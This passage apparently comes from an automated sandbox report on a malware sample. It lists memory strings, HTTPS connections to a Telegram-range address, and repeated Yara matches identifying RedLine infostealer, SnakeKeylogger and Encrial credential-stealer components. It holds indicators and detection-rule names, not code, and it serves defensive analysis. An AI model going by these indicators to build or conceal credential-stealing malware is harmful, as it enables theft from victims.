jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002284D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.00000000237D4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3763255345.0000000023850000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2469665166.0000000023860000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3765263149.000000001F260000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3766205555.000000002562B000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2643241704.0000000025639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53604
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53591 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53604 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53689
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53644
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53643
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53636 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53582 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53624 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53696
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53657
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53612
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53696 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53624
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53701
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53667
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53644 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53667 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53591
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53657 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53637
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53636
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53643 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53689 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53637 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53643 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 10.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.brightness.exe.215f2418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.brightness.exe.21659f78.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.Aiymwhpj.PIF.212333d8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
